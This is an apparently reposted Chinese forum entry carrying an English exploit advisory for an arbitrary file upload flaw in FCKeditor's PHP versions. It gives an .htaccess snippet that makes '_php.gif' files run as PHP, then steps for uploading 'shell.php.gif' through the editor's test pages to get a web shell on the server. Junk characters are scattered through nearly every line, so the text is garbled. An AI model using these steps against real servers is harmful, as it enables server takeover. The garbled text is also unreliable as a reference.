FCKeditor所有php版本Upload上传漏洞
; [$ X3 u* m* y/ T作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:073 B* m. [% f* p8 H. W: ?" Y9 x
减小字体 增大字体
9 X' u! ^, E! D4 W2 I2 q) J[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability/ k; n5 l s' m2 w9 B8 ~( S. t
[+] Date: 20113 a- G& a8 N+ d$ i) J
[+] Author : sinesafe.cn1 Y# O5 { U \) Q& R- M
[+] Website : WwW.sinesafe.cn( j5 ^, n' g; d/ O$ ?- J
———————————————————( h( q8 Z1 w5 i5 y( t
1.create a htaccess file:
5 D" g% \% C0 ?; R+ h& r) pcode:0 x$ g5 F; b4 u1 c+ ]5 Z
<FilesMatch “_php.gif”>
* [+ |5 W7 W/ w* ]% _: A+ L" mSetHandler application/x-httpd-php
. `0 \1 M; x3 j8 l W</FilesMatch>7 b" _. R( k. X7 w; n0 b8 l$ H7 c
; X- ?% d `: j5 S% X) B/ P3 y2.Now upload this htaccess with FCKeditor.
. Q/ q2 o9 E, q. @& N* L3 n. {6 i
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html s- G" L$ }4 n8 M- a
. H/ q( s& U9 U4 T8 t$ K
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html5 k7 ]- F% r# W! ^. N
4 _9 o# B/ |0 O( f" D———————————————————————————————-8 g5 ]# ]+ \! }" N, A+ R
3.Now upload shell.php.gif with FCKeditor.+ B) S4 N2 t d& y7 ~
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
0 o4 z, H" i: R: @4 c2 a2 j5.http://www.sinesafe.cn/anything/shell_php.gif/ U8 |7 z9 U. W, V+ \+ Y, R
6.Now shell is available from server. |
- h5 ?# k X7 q- ^! N& M
2 [4 h8 x4 p# C2 d% {
% m K$ C0 Q/ V4 a6 B. W9 t8 I
|
发表于 2013-10-27 17:25:21
收藏
支持
反对